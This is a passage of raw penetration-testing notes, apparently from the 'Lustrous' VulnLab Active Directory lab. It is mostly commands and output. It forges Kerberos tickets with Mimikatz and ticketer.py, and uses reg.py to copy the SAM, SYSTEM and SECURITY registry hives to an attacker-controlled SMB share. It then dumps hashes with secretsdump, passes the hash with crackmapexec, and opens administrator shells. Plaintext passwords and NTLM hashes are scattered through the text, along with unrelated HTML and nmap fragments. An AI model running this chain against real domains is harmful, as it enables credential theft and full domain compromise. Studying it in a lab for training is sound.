.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(powershell) # kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /ptt /id:1114 /target:lusdc.lustrous.vl /service:http /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /user:tony.ward
User : tony.ward
Domain : lustrous.vl (LUSTROUS)
SID : S-1-5-21-2355092754-1584501958-1513963426
User Id : 1114
Groups Id : *513 512 520 518 519
ServiceKey: e67af8b3d78df5a02eb0d57b6cb60717 - rc4_hmac_nt
Service : http
Target : lusdc.lustrous.vl
Lifetime : 2/26/2024 6:16:25 PM ; 2/23/2034 6:16:25 PM ; 2/23/2034 6:16:25 PM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'tony.ward @ lustrous.vl' successfully submitted for current session
PS C:\Users\Administrator> klist
Current LogonId is 0:0x3e7
Cached Tickets: (1)
#0> Client: tony.ward @ lustrous.vl
Server: http/lusdc.lustrous.vl @ lustrous.vl
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40a00000 -> forwardable renewable pre_authent
Start Time: 2/26/2024 18:16:25 (local)
End Time: 2/23/2034 18:16:25 (local)
Renew Time: 2/23/2034 18:16:25 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0
Kdc Called:
</thead>
<tbody>
<tr>
<td>
4
</td>
<td>
Password Reminder
</td>
<td>
U_cPVQqEI50i1X
</td>
<td>
lustrous_tony.ward
</td>
<td>
<a class="btn btn-danger" href="/Internal/DeleteNote/4">Delete</a>
tony.ward:U_cPVQqEI50i1X
Tony.ward is backupadmin.
HTTP Silver Ticket in LINUX WAY:
ticketer.py -nthash E67AF8B3D78DF5A02EB0D57B6CB60717 -domain-sid S-1-5-21-2355092754-1584501958-1513963426 -domain lustrous.vl -spn HTTP/lusdc.lustrous.vl -user-id 1114 tony.ward
jkr@ubu(10.8.0.4):~/private/vl-lustrous$ export KRB5CCNAME=tony.ward.ccache
jkr@ubu(10.8.0.4):~/private/vl-lustrous$ firefox
Backupadmin Priv esc:
sudo /home/kali/.local/bin/smbserver.py -smb2support "share" .
sudo /home/kali/.local/bin/reg.py lusrous.vl/tony.ward:'U_cPVQqEI50i1X'@LUSDC.lusrous.vl backup -o '\\10.8.0.71\share'
sudo /home/kali/.local/bin/reg.py lusrous.vl/tony.ward:'U_cPVQqEI50i1X'@LUSDC.lusrous.vl save -keyName 'HKLM\SAM' -o '\\10.8.0.71\share'
sudo /home/kali/.local/bin/reg.py lusrous.vl/tony.ward:'U_cPVQqEI50i1X'@LUSDC.lusrous.vl save -keyName 'HKLM\SYSTEM' -o '\\10.8.0.71\share'
sudo /home/kali/.local/bin/reg.py lusrous.vl/tony.ward:'U_cPVQqEI50i1X'@LUSDC.lusrous.vl save -keyName 'HKLM\SECURITY' -o '\\10.8.0.71\share'
root㉿kali)-[/home/…/results/10.10.232.181/loot/JUNK]
└─# secretsdump.py -sam ./SAM.save -system ./SYSTEM.save -security ./SECURITY.save local
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:962e718ea05d21ad83c87facae92ba76
secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:962e718ea05d21ad83c87facae92ba76 -just-dc 'lusrous.vl/LUSDC$'@10.10.196.101
┌──(root㉿kali)-[/home/kali/BOXES/ACADEMY]
└─# crackmapexec smb 10.10.196.101 -u administrator -H "b8d9c7bd6de2a14237e0eff1afda2476" --shares
SMB 10.10.196.101 445 LUSDC [*] Windows 10.0 Build 20348 x64 (name:LUSDC) (domain:lustrous.vl) (signing:True) (SMBv1:False)
SMB 10.10.196.101 445 LUSDC [+] lustrous.vl\administrator:b8d9c7bd6de2a14237e0eff1afda2476 (Pwn3d!)
https://www.vuln.dev/2021/12/27/lab-lustrous-walkthrough/
https://medium.com/@thebinary0x1/lustrous-vulnlab-walkthrough-f314f8b86134
https://medium.com/@thebinary0x1/lustrous-vulnlab-walkthrough-f314f8b86134
ADMINISTRATOR SHELL !
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/22/2021 12:43 PM 36 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
VL{REDIRECTED}
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
ROOT.TXT: VL{REDIRECTED}
rlwrap psexec.py 'Administrator:XZ9i=bgA8KhRP.f=jr**Qgd3Qh@n9dRF@10.10.232.182'
49668/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2016 (85%)
OS CPE: cpe:/o:microsoft:windows_server_2016
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).